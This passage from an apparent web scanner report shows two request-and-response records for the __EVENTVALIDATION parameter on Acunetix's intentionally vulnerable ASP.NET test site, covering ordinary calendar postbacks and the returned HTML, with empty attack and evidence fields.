daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1117 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,117 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8141&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA0ww8H9oIZGRkUL3tezJZQJ4VeIUBQ43uD3026n0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKF%2FN64CQKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHgINEm0IwbaKU8j88EPirUN99JT
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:36:06 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgAA0ww8H9oIZGRkUL3tezJZQJ4VeIUBQ43uD3026n0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKF/N64CQKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDHgINEm0IwbaKU8j88EPirUN99JT" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:White" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1165 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,165 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8564&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAjyGha9sIZGRkiSTF0CNTEoT%2F9jnLFZSTUn2aqxs%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKF2L%2FrBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy%2BPoBQLcy%2BPoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7%2F5DwLcy7%2F5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ%2Bg8CsdLZ%2Bg8CsdLNkQcCsdLNkQcCsdKh%2BQUCsdKh%2BQUCsdLVnQ0CsdLVnQ0CivmnBQKK%2BacFAor529kJAor529kJAor5z%2FwCAor5z%2FwCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v%2BAFAor5v%2BAFAor504QNAor504QNAor5h%2BwLAor5h%2BwLAor5u4MDAor5u4MDAr%2BT58QJAr%2BT58QJAr%2BTm5sBAr%2BTm5sBAr%2BTj74KAr%2BTj74KAr%2BTo9UDAr%2BTo9UDAr%2BT1%2BkMAr%2BT1%2BkMAr%2BTy4wEAr%2BTy4wEAr%2BT%2F6MNAr%2BT%2F6MNAr%2BTk8YGAr%2BTk8YGAr%2BTx68DAr%2BTx68DAr%2BT%2B8IMAr%2BT%2B8IMW18HrtDLvBI69w72FeWLatQuMJY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:40:05 GMT Content-Length: 12448
Response Body - size: 12,448 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBAmiQzYtsIHgJTRBYBBgBAjyGha9sIZGRkiSTF0CNTEoT/9jnLFZSTUn2aqxs=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKF2L/rBgK1zpjCCwKqztDzBAL7pP2sCQL7pP2sCQL7pJHDAgL7pJHDAgLcy+PoBQLcy+PoBQLcy5ePDQLcy5ePDQLcy4uiBgLcy4uiBgLcy7/5DwLcy7/5DwLcy9OdBwLcy9OdBwLcy8cwAtzLxzAC3Mv71wkC3Mv71wkC3Mvv6gIC3Mvv6gIC3MvD0w8C3MvD0w8C3Mv39ggC3Mv39ggCsdLBnwoCsdLBnwoCsdL1sgMCsdL1sgMCsdLpyQwCsdLpyQwCsdKd7AUCsdKd7AUCsdKxgw0CsdKxgw0CsdKlpgYCsdKlpgYCsdLZ+g8CsdLZ+g8CsdLNkQcCsdLNkQcCsdKh+QUCsdKh+QUCsdLVnQ0CsdLVnQ0CivmnBQKK+acFAor529kJAor529kJAor5z/wCAor5z/wCAor545MKAor545MKAor5l7YDAor5l7YDAor5i80MAor5i80MAor5v+AFAor5v+AFAor504QNAor504QNAor5h+wLAor5h+wLAor5u4MDAor5u4MDAr+T58QJAr+T58QJAr+Tm5sBAr+Tm5sBAr+Tj74KAr+Tj74KAr+To9UDAr+To9UDAr+T1+kMAr+T1+kMAr+Ty4wEAr+Ty4wEAr+T/6MNAr+T/6MNAr+Tk8YGAr+Tk8YGAr+Tx68DAr+Tx68DAr+T+8IMAr+T+8IMW18HrtDLvBI69w72FeWLatQuMJY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8582')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8548')" style="color:Black" title="May 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8549')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8550')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8551')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8552')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8553')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8554')" style="color:Black" title="June 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8555')" style="color:Black" title="June 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8556')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8557')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8558')" style="color:Black" title="June 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8559')" style="color:Black" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8560')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8561')" style="color:Black" title="June 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8562')" style="color:Black" title="June 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8563')" style="color:Black" title="June 12">12</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8564')" style="color:White" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8565')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8566')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8567')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8568')" style="color:Black" title="June 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8569')" style="color:Black" title="June 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8570')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8571')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8572')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8573')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8574')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8575')" style="color:Black" title="June 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. 